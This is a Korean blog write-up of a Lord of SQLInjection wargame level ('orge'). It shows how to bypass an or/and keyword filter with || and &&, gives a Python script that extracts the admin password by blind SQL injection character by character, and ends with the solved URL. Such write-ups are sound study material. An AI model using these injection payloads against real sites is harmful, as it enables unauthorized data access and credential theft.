[LOS] Level6: orge
두비니
·2020. 1. 4. 16:26
Lord Of SQLInjection: lv.6 orge
orge입니다.
or 또는 and를 사용하면 안되네요.
or과 and는 각각 ||와 &&를 이용하면 우회 가능합니다.
Hello admin까지는 출력하였고, 이 스테이지를 해결하는 조건이 pw를 알아내야 하므로 이는 python코드로 알아냅시다.
import httplib
headers = {'Content-Type':'application/x-www-form-urlencoded', 'Cookie':'PHPSESSID=ti3sc786arte8880jt3bjk2kt3'}
conn = httplib.HTTPSConnection('los.rubiya.kr', 443)
pw=''
for i in range(10):
for j in range(32, 128):
conn.request('GET', '/chall/orge_bad2f25db233a7542be75844e314e9f3.php?pw=%27%20||%20id=%27admin%27%26%26%20ascii(substr(pw,'+str(i)+',1))='+str(j)+'%23','',headers)
r1 = conn.getresponse().read()
if 'Hello admin' in r1:
pw += chr(j)
print pw
break
주의해야할 점은 &&은 %26으로 입력하지 않으면 오류가 발생하더라구요. 그래서 주의해주시면 좋을것같습니당
비밀번호가 잘 얻어졌고, 이제 문제를 풉시다
https://los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php?pw=7b751aec
'War Games > Lord of SQLInjection' 카테고리의 다른 글
[LOS] Level7: troll (0) | 2020.01.05 |
---|---|
[LOS] cheat sheet(이스터에그) (0) | 2020.01.04 |
[LOS] Level5: wolfman (0) | 2020.01.03 |
[LOS] Level4: orc (0) | 2020.01.01 |
[LOS] Level3: goblin (0) | 2019.12.31 |